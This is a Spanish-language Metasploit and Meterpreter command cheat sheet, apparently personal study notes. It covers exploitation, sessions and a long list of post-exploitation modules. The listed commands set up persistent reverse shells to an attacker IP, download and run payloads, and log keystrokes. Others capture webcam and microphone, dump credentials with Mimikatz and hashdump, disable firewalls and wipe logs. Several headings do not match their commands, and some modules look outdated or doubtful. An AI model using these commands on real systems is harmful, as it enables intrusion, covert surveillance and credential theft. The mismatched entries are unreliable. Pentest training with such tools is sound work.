
📘METASPLOIT
comandos básicos y formas de uso de Metasploit para que puedas tomar notas:
Iniciar Metasploit:
msfconsole
Explicación: Inicia la consola de Metasploit.
Mostrar módulos disponibles:
show modules
Explicación: Muestra todos los módulos disponibles en Metasploit.
Buscar módulos por nombre o descripción:
search <keyword>
Explicación: Busca módulos que coincidan con el término clave en el nombre o descripción.
Seleccionar un módulo para usar:
use <module_name>
Explicación: Selecciona un módulo específico para utilizarlo.
Mostrar opciones del módulo:
show options
Explicación: Muestra las opciones disponibles para el módulo seleccionado.
Configurar opciones del módulo:
set <option_name> <value>
Explicación: Configura opciones específicas para el módulo seleccionado.
Mostrar payloads disponibles:
show payloads
Explicación: Muestra todos los payloads disponibles para el módulo seleccionado.
Seleccionar un payload:
set payload <payload_name>
Explicación: Selecciona un payload específico para utilizarlo.
Configurar opciones del payload:
set LHOST <your_IP> set LPORT <listening_port>
Explicación: Configura opciones específicas para el payload, como la dirección IP del atacante (LHOST) y el puerto de escucha (LPORT).
Ejecutar el exploit:
exploit
Explicación: Ejecuta el exploit con la configuración y el payload especificados.
Mostrar sesiones abiertas:
sessions
Explicación: Muestra las sesiones de Metasploit que están abiertas.
Interactuar con una sesión abierta:
sessions -i <session_number>
Explicación: Interactúa con una sesión abierta utilizando su número de sesión.
Capturar una shell persistente en el sistema objetivo:
run persistence -U -i 5 -p <listening_port> -r <your_IP>
Explicación: Configura una shell persistente para ejecutarse en el sistema objetivo cada 5 minutos y conectarse a la dirección IP del atacante en el puerto especificado.
Algunos comandos adicionales de Metasploit, incluyendo aquellos relacionados con la gestión de la base de datos de Metasploit (MSFDB):
Configurar la base de datos de Metasploit:
db_status
Explicación: Muestra el estado actual de la base de datos de Metasploit.
Iniciar la base de datos de Metasploit:
db_start
Explicación: Inicia la base de datos de Metasploit si no está en ejecución.
Importar hosts escaneados a la base de datos:
db_import <path/to/scanned_hosts.xml>
Explicación: Importa hosts escaneados desde un archivo XML a la base de datos de Metasploit.
Mostrar información sobre hosts en la base de datos:
hosts
Explicación: Muestra información sobre los hosts almacenados en la base de datos.
Mostrar información detallada sobre un host específico:
hosts -d <host_IP>
Explicación: Muestra información detallada sobre un host específico en la base de datos.
Eliminar un host de la base de datos:
db_nmap -p <port_range> --script vuln <target_IP>
Explicación: Escanea un host específico utilizando Nmap con detección de vulnerabilidades y almacena los resultados en la base de datos.
Ejecutar una auditoría de seguridad en hosts almacenados en la base de datos:
db_autopwn -p -R <host_filter>
Explicación: Ejecuta una auditoría de seguridad automática en los hosts almacenados en la base de datos.
Mostrar exploits disponibles en la base de datos:
services
Explicación: Muestra información sobre los servicios detectados y almacenados en la base de datos.
Cargar un exploit desde la base de datos:
use exploit/multi/handler
Explicación: Carga un exploit desde la base de datos para su uso.
Actualizar información sobre exploits desde Internet:
db_update
Explicación: Actualiza la información sobre exploits desde Internet y la almacena en la base de datos.
Buscar exploits en la base de datos:
search platform:windows type:exploit
Explicación: Busca exploits en la base de datos según la plataforma (en este caso, Windows).
Mostrar información sobre un exploit específico:
info <exploit_path>
Explicación: Muestra información detallada sobre un exploit específico.
comandos especiales de Meterpreter y sus explicaciones:
Ejecutar un comando en la máquina objetivo:
execute -f notepad.exe
Explicación: Ejecuta el comando especificado (
notepad.exe
en este caso) en la máquina objetivo.
Listar procesos en la máquina objetivo:
ps
Explicación: Muestra una lista de procesos en ejecución en la máquina objetivo.
Cambiar de proceso en Meterpreter:
migrate <process_ID>
Explicación: Cambia a otro proceso en la máquina objetivo utilizando su ID de proceso.
Capturar la webcam de la máquina objetivo:
webcam_snap
Explicación: Captura una imagen de la webcam de la máquina objetivo.
Grabar el audio del micrófono de la máquina objetivo:
record_mic -d 10
Explicación: Graba audio desde el micrófono de la máquina objetivo durante 10 segundos.
Capturar la pantalla de la máquina objetivo:
screenshot
Explicación: Captura la pantalla de la máquina objetivo y muestra la imagen.
Obtener información del sistema objetivo:
sysinfo
Explicación: Muestra información detallada sobre el sistema operativo y la configuración de la máquina objetivo.
Enumerar sesiones Meterpreter activas:
bashCopy codesessions
Explicación: Muestra una lista de sesiones Meterpreter activas.
Interactuar con una sesión Meterpreter específica:
sessions -i <session_ID>
Explicación: Permite interactuar con una sesión Meterpreter específica utilizando su ID de sesión.
Cargar un script en Meterpreter:
load script <script_name>
Explicación: Carga un script en Meterpreter para realizar acciones específicas.
Habilitar el servidor VNC en la máquina objetivo:
run vnc
Explicación: Inicia un servidor VNC en la máquina objetivo, permitiendo la conexión a su escritorio.
Exfiltrar archivos de la máquina objetivo a la máquina del atacante:
download <remote_file> <local_path>
Explicación: Descarga un archivo desde la máquina objetivo a la máquina del atacante.
Cargar un módulo adicional en Meterpreter:
load <module_name>
Explicación: Carga un módulo adicional en Meterpreter para ampliar sus capacidades.
Ejecutar comandos del sistema operativo en Meterpreter:
shell
Explicación: Abre una shell interactiva en el contexto del sistema operativo de la máquina objetivo.
Cerrar una sesión Meterpreter:
sessions -k <session_ID>
Explicación: Cierra una sesión Meterpreter específica utilizando su ID de sesión.
comandos especiales de Meterpreter, incluyendo aquellos relacionados con la escalada de privilegios y otras funciones avanzadas:
Capturar pulsaciones de teclas en la máquina objetivo:
keyscan_start
Explicación: Inicia la captura de pulsaciones de teclas en la máquina objetivo.
Detener la captura de pulsaciones de teclas:
keyscan_dump
Explicación: Detiene la captura de pulsaciones de teclas y muestra el resultado.
Enumerar usuarios en la máquina objetivo:
enum_users
Explicación: Enumera los usuarios presentes en la máquina objetivo.
Enumerar redes y compartir recursos en la máquina objetivo:
net
Explicación: Muestra información sobre redes y recursos compartidos en la máquina objetivo.
Ejecutar un script en PowerShell en la máquina objetivo:
powershell_execute <script>
Explicación: Ejecuta un script de PowerShell en la máquina objetivo.
Capturar las credenciales almacenadas en la máquina objetivo:
mimikatz_command -f sekurlsa::logonpasswords
Explicación: Utiliza Mimikatz para capturar las credenciales almacenadas en la máquina objetivo.
Cargar un keylogger en la máquina objetivo:
run post/windows/capture/keylog_recorder
Explicación: Carga un keylogger en la máquina objetivo para registrar pulsaciones de teclas.
Escalar privilegios en la máquina objetivo (Windows)((PROBAR)):
getsystem
Explicación: Intenta escalar privilegios en la máquina objetivo a SYSTEM.
Agregar una excepción al firewall de la máquina objetivo:
run post/multi/manage/firewall_bypass
Explicación: Agrega una excepción al firewall de la máquina objetivo para permitir conexiones entrantes.
Capturar tráfico de red en la máquina objetivo:
run packetrecorder -li <interface> -o <output_file.pcap>
Explicación: Captura el tráfico de red en la máquina objetivo y guarda los resultados en un archivo pcap.
Ejecutar un comando arbitrario en la máquina objetivo:
execute -f cmd.exe -a "/c <command>"
Explicación: Ejecuta un comando arbitrario en la máquina objetivo utilizando cmd.exe.
Habilitar el servidor FTP en la máquina objetivo:
use auxiliary/server/ftp
Explicación: Habilita un servidor FTP en la máquina objetivo para transferencia de archivos.
Modificar la fecha de creación de un archivo en la máquina objetivo:
timestomp <file_path> -v <date>
Explicación: Modifica la fecha de creación de un archivo en la máquina objetivo.
Inyectar un payload en un proceso en ejecución:
run post/multi/manage/inject
Explicación: Inyecta un payload en un proceso en ejecución en la máquina objetivo.
Mostrar información sobre la configuración del sistema objetivo:
sysinfo
Explicación: Muestra información detallada sobre la configuración del sistema objetivo.
Comandos principales:
background
: pone en segundo plano la sesión actualexit
: Terminar la sesión de Meterpreterguid
: Obtenga el GUID (Identificador único global) de la sesiónhelp
: muestra el menú de ayudainfo
: muestra información sobre un módulo de publicación.irb
: abre un shell Ruby interactivo en la sesión actual.load
: Carga una o más extensiones de Meterpretermigrate
: Le permite migrar Meterpreter a otro procesorun
: Ejecuta un script de Meterpreter o un módulo de publicación.sessions
: cambia rápidamente a otra sesión
Comandos del sistema de archivos:
cd
: Cambiará de directoriols
: enumerará los archivos en el directorio actual (el directorio también funcionará)pwd
: Imprime el directorio de trabajo actualedit
: le permitirá editar un archivocat
: Mostrará el contenido de un archivo en la pantalla.rm
: Eliminará el archivo especificadosearch
: Buscará archivosupload
: Subirá un archivo o directoriodownload
: Descargará un archivo o directorio
Comandos de red
arp
: Muestra la caché ARP (Protocolo de resolución de direcciones) del hostifconfig
: Muestra las interfaces de red disponibles en el sistema de destino.netstat
: Muestra las conexiones de red.portfwd
: reenvía un puerto local a un servicio remotoroute
: Le permite ver y modificar la tabla de enrutamiento.
Comandos del sistema:
clearev
: borra los registros de eventosexecute
: Ejecuta un comandogetpid
: Muestra el identificador del proceso actual.getuid
: Muestra al usuario que Meterpreter se está ejecutando comokill
: Termina un procesopkill
: Termina procesos por nombreps
: enumera los procesos en ejecuciónreboot
: Reinicia la computadora remotashell
: cae en un shell de comandos del sistemashutdown
: Apaga la computadora remotasysinfo
: Obtiene información sobre el sistema remoto, como el sistema operativo.
Otros comandos (estos se enumerarán en diferentes categorías de menú en el menú de ayuda):
idletime
: Devuelve el número de segundos que el usuario remoto ha estado inactivokeyscan_dump
: Vuelca el búfer de pulsaciones de teclas.keyscan_start
: Comienza a capturar pulsaciones de teclaskeyscan_stop
: Deja de capturar pulsaciones de teclasscreenshare
: Le permite ver el escritorio del usuario remoto en tiempo realscreenshot
: toma una captura de pantalla del escritorio interactivorecord_mic
: Graba audio desde el micrófono predeterminado durante X segundoswebcam_chat
: inicia un chat de vídeowebcam_list
: enumera las cámaras webwebcam_snap
: toma una instantánea de la cámara web especificadawebcam_stream
: reproduce una transmisión de video desde la cámara web especificadagetsystem
: Intenta elevar su privilegio al de sistema localhashdump
: Vuelca el contenido de la base de datos SAM
Módulos de Post-Explotación:
Módulo:
post/multi/manage/firewall_bypass
Ruta:
use post/multi/manage/firewall_bypass
Descripción: Agrega una excepción al firewall de la máquina objetivo para permitir conexiones entrantes.
Uso:
run post/multi/manage/firewall_bypass
Módulo:
post/windows/gather/checkvm
Ruta:
use post/windows/gather/checkvm
Descripción: Verifica si la máquina objetivo se está ejecutando en una máquina virtual.
Uso:
run post/windows/gather/checkvm
Módulo:
post/windows/gather/enum_domain_users
Ruta:
use post/windows/gather/enum_domain_users
Descripción: Enumera los usuarios del dominio en la máquina objetivo.
Uso:
run post/windows/gather/enum_domain_users
Módulo:
post/windows/gather/enum_shares
Ruta:
use post/windows/gather/enum_shares
Descripción: Enumera los recursos compartidos en la máquina objetivo.
Uso:
run post/windows/gather/enum_shares
Módulo:
post/windows/gather/enum_logged_on_users
Ruta:
use post/windows/gather/enum_logged_on_users
Descripción: Enumera los usuarios que han iniciado sesión en la máquina objetivo.
Uso:
run post/windows/gather/enum_logged_on_users
Módulo:
post/windows/manage/persistence_exe
Ruta:
use post/windows/manage/persistence_exe
Descripción: Establece persistencia ejecutando un payload cada vez que se inicia la máquina.
Uso:
run post/windows/manage/persistence_exe
Módulo:
post/windows/manage/download_exec
Ruta:
use post/windows/manage/download_exec
Descripción: Descarga y ejecuta un archivo en la máquina objetivo.
Uso:
run post/windows/manage/download_exec URL=http://path/to/file.exe
Módulo:
post/windows/manage/migrate
Ruta:
use post/windows/manage/migrate
Descripción: Cambia a otro proceso en la máquina objetivo para evadir detección.
Uso:
run post/windows/manage/migrate PROCESS_ID
Estos módulos de post-explotación son esenciales para realizar tareas específicas después de comprometer una máquina y proporcionan funcionalidades avanzadas en Metasploit.
más módulos de post-explotación en Metasploit, cada uno con su descripción y uso:
Módulo:
post/windows/gather/enum_patches
Ruta:
use post/windows/gather/enum_patches
Descripción: Enumera los parches instalados en la máquina objetivo.
Uso:
run post/windows/gather/enum_patches
Módulo:
post/windows/gather/enum_applications
Ruta:
use post/windows/gather/enum_applications
Descripción: Enumera las aplicaciones instaladas en la máquina objetivo.
Uso:
run post/windows/gather/enum_applications
Módulo:
post/windows/gather/enum_wifi
Ruta:
use post/windows/gather/enum_wifi
Descripción: Enumera los perfiles de Wi-Fi almacenados en la máquina objetivo.
Uso:
run post/windows/gather/enum_wifi
Módulo:
post/windows/gather/enum_vault
Ruta:
use post/windows/gather/enum_vault
Descripción: Enumera los elementos almacenados en el "Credential Vault" en la máquina objetivo.
Uso:
run post/windows/gather/enum_vault
Módulo:
post/windows/gather/enum_services
Ruta:
use post/windows/gather/enum_services
Descripción: Enumera los servicios instalados en la máquina objetivo.
Uso:
run post/windows/gather/enum_services
Módulo:
post/windows/gather/enum_logged_sessions
Ruta:
use post/windows/gather/enum_logged_sessions
Descripción: Enumera las sesiones de usuario iniciadas en la máquina objetivo.
Uso:
run post/windows/gather/enum_logged_sessions
Módulo:
post/windows/gather/enum_firefox
Ruta:
use post/windows/gather/enum_firefox
Descripción: Enumera las credenciales almacenadas en Firefox en la máquina objetivo.
Uso:
run post/windows/gather/enum_firefox
Módulo:
post/windows/gather/enum_chrome
Ruta:
use post/windows/gather/enum_chrome
Descripción: Enumera las credenciales almacenadas en Chrome en la máquina objetivo.
Uso:
run post/windows/gather/enum_chrome
Módulo:
post/windows/gather/enum_ie
Ruta:
use post/windows/gather/enum_ie
Descripción: Enumera las credenciales almacenadas en Internet Explorer en la máquina objetivo.
Uso:
run post/windows/gather/enum_ie
Módulo:
post/windows/gather/enum_snmp
Ruta:
use post/windows/gather/enum_snmp
Descripción: Enumera información SNMP de la máquina objetivo.
Uso:
run post/windows/gather/enum_snmp
Módulo:
post/windows/gather/enum_printer
Ruta:
use post/windows/gather/enum_printer
Descripción: Enumera las impresoras instaladas en la máquina objetivo.
Uso:
run post/windows/gather/enum_printer
Módulo:
post/windows/manage/killfw
Ruta:
use post/windows/manage/killfw
Descripción: Detiene y desactiva el firewall de Windows en la máquina objetivo.
Uso:
run post/windows/manage/killfw
Estos módulos ofrecen una amplia variedad de funcionalidades para recopilar información y realizar acciones específicas en la máquina objetivo después de una explotación exitosa.
más módulos de post-explotación específicos para sistemas Linux en Metasploit:
Módulo:
post/linux/gather/enum_configs
Ruta:
use post/linux/gather/enum_configs
Descripción: Enumera configuraciones críticas de la máquina Linux objetivo.
Uso:
run post/linux/gather/enum_configs
Módulo:
post/linux/gather/enum_sessions
Ruta:
use post/linux/gather/enum_sessions
Descripción: Enumera sesiones de usuarios abiertas en la máquina Linux.
Uso:
run post/linux/gather/enum_sessions
Módulo:
post/linux/gather/enum_services
Ruta:
use post/linux/gather/enum_services
Descripción: Enumera los servicios en ejecución en la máquina Linux.
Uso:
run post/linux/gather/enum_services
Módulo:
post/linux/gather/enum_applications
Ruta:
use post/linux/gather/enum_applications
Descripción: Enumera las aplicaciones instaladas en la máquina Linux.
Uso:
run post/linux/gather/enum_applications
Módulo:
post/linux/gather/enum_logins
Ruta:
use post/linux/gather/enum_logins
Descripción: Enumera información sobre inicios de sesión en la máquina Linux.
Uso:
run post/linux/gather/enum_logins
Módulo:
post/linux/gather/enum_network
Ruta:
use post/linux/gather/enum_network
Descripción: Enumera información de red en la máquina Linux.
Uso:
run post/linux/gather/enum_network
Módulo:
post/linux/gather/enum_users
Ruta:
use post/linux/gather/enum_users
Descripción: Enumera los usuarios en la máquina Linux.
Uso:
run post/linux/gather/enum_users
Módulo:
post/linux/gather/enum_files
Ruta:
use post/linux/gather/enum_files
Descripción: Enumera archivos y directorios críticos en la máquina Linux.
Uso:
run post/linux/gather/enum_files
Módulo:
post/linux/gather/enum_configs
Ruta:
use post/linux/gather/enum_configs
Descripción: Enumera configuraciones específicas de la máquina Linux.
Uso:
run post/linux/gather/enum_configs
Módulo:
post/linux/manage/clear_logs
Ruta:
use post/linux/manage/clear_logs
Descripción: Borra los registros de logs en la máquina Linux para ocultar actividades.
Uso:
run post/linux/manage/clear_logs
Estos módulos te permitirán realizar diversas acciones y recopilar información en sistemas Linux después de una explotación exitosa.
módulos de Metasploit para la recolección de hashes y credenciales de usuarios en sistemas Windows y Linux:
Para Windows:
Módulo:
post/windows/gather/smart_hashdump
Ruta:
use post/windows/gather/smart_hashdump
Descripción: Recopila hashes de contraseñas desde la memoria en sistemas Windows.
Uso:
run post/windows/gather/smart_hashdump
Módulo:
post/windows/gather/credentials/gpp
Ruta:
use post/windows/gather/credentials/gpp
Descripción: Enumera credenciales almacenadas en Preferencias de Política de Grupo (GPP) en sistemas Windows.
Uso:
run post/windows/gather/credentials/gpp
Módulo:
post/windows/gather/credentials/mimikatz
Ruta:
use post/windows/gather/credentials/mimikatz
Descripción: Utiliza Mimikatz para extraer credenciales almacenadas en sistemas Windows.
Uso:
run post/windows/gather/credentials/mimikatz
Módulo:
post/windows/gather/credentials/credential_collector
Ruta:
use post/windows/gather/credentials/credential_collector
Descripción: Recopila credenciales almacenadas en sistemas Windows.
Uso:
run post/windows/gather/credentials/credential_collector
Para Linux:
Módulo:
post/linux/gather/enum_ssh
Ruta:
use post/linux/gather/enum_ssh
Descripción: Enumera claves privadas y configuraciones de SSH en sistemas Linux.
Uso:
run post/linux/gather/enum_ssh
Módulo:
post/linux/gather/enum_keys
Ruta:
use post/linux/gather/enum_keys
Descripción: Enumera claves privadas y archivos de configuración en sistemas Linux.
Uso:
run post/linux/gather/enum_keys
Módulo:
post/linux/gather/enum_passwords
Ruta:
use post/linux/gather/enum_passwords
Descripción: Enumera contraseñas y credenciales almacenadas en sistemas Linux.
Uso:
run post/linux/gather/enum_passwords
Módulo:
post/linux/gather/enum_gnome
Ruta:
use post/linux/gather/enum_gnome
Descripción: Enumera credenciales almacenadas en entornos GNOME en sistemas Linux.
Uso:
run post/linux/gather/enum_gnome
Módulo:
post/linux/gather/enum_kde_wallet
Ruta:
use post/linux/gather/enum_kde_wallet
Descripción: Enumera credenciales almacenadas en el "KDE Wallet" en sistemas Linux.
Uso:
run post/linux/gather/enum_kde_wallet
Estos módulos te permitirán recolectar hashes y credenciales de usuarios en sistemas Windows y Linux después de una explotación exitosa.
variedad de módulos de Metasploit para sistemas Windows y Linux, incluyendo módulos auxiliares, de escaneo, y más:
Auxiliares:
Para Windows:
Módulo:
auxiliary/admin/http/iis_put
Ruta:
use auxiliary/admin/http/iis_put
Descripción: Intenta realizar un ataque PUT en servidores IIS para cargar un archivo.
Uso:
run auxiliary/admin/http/iis_put
Módulo:
auxiliary/admin/smb/smb_enumshares
Ruta:
use auxiliary/admin/smb/smb_enumshares
Descripción: Enumera los recursos compartidos en un servidor SMB en sistemas Windows.
Uso:
run auxiliary/admin/smb/smb_enumshares
Módulo:
auxiliary/scanner/http/jboss_vulnscan
Ruta:
use auxiliary/scanner/http/jboss_vulnscan
Descripción: Escanea servidores JBoss para vulnerabilidades conocidas.
Uso:
run auxiliary/scanner/http/jboss_vulnscan
Para Linux:
Módulo:
auxiliary/scanner/ssh/ssh_enumusers
Ruta:
use auxiliary/scanner/ssh/ssh_enumusers
Descripción: Enumera usuarios a través de SSH en sistemas Linux.
Uso:
run auxiliary/scanner/ssh/ssh_enumusers
Módulo:
auxiliary/scanner/mysql/mysql_version
Ruta:
use auxiliary/scanner/mysql/mysql_version
Descripción: Escanea servidores MySQL para obtener la versión.
Uso:
run auxiliary/scanner/mysql/mysql_version
Módulo:
auxiliary/scanner/ftp/ftp_version
Ruta:
use auxiliary/scanner/ftp/ftp_version
Descripción: Escanea servidores FTP para obtener la versión.
Uso:
run auxiliary/scanner/ftp/ftp_version
De Escaneo:
Para Windows:
Módulo:
scanner/smb/smb_version
Ruta:
use scanner/smb/smb_version
Descripción: Escanea servidores SMB para obtener la versión.
Uso:
run scanner/smb/smb_version
Módulo:
scanner/winrm/winrm_version
Ruta:
use scanner/winrm/winrm_version
Descripción: Escanea servidores WinRM para obtener la versión.
Uso:
run scanner/winrm/winrm_version
Módulo:
scanner/http/ntlm_info
Ruta:
use scanner/http/ntlm_info
Descripción: Escanea servidores HTTP para obtener información sobre la autenticación NTLM.
Uso:
run scanner/http/ntlm_info
Para Linux:
Módulo:
scanner/ssh/ssh_login
Ruta:
use scanner/ssh/ssh_login
Descripción: Escanea servidores SSH para realizar un intento de inicio de sesión.
Uso:
run scanner/ssh/ssh_login
Módulo:
scanner/http/wordpress_login_enum
Ruta:
use scanner/http/wordpress_login_enum
Descripción: Escanea sitios WordPress para enumerar usuarios.
Uso:
run scanner/http/wordpress_login_enum
Módulo:
scanner/http/joomla_version
Ruta:
use scanner/http/joomla_version
Descripción: Escanea sitios Joomla para obtener la versión.
Uso:
run scanner/http/joomla_version
Estos módulos ofrecen una variedad de funcionalidades, desde explorar versiones de servicios hasta realizar escaneos de vulnerabilidades y enumerar información sobre sistemas.
Last updated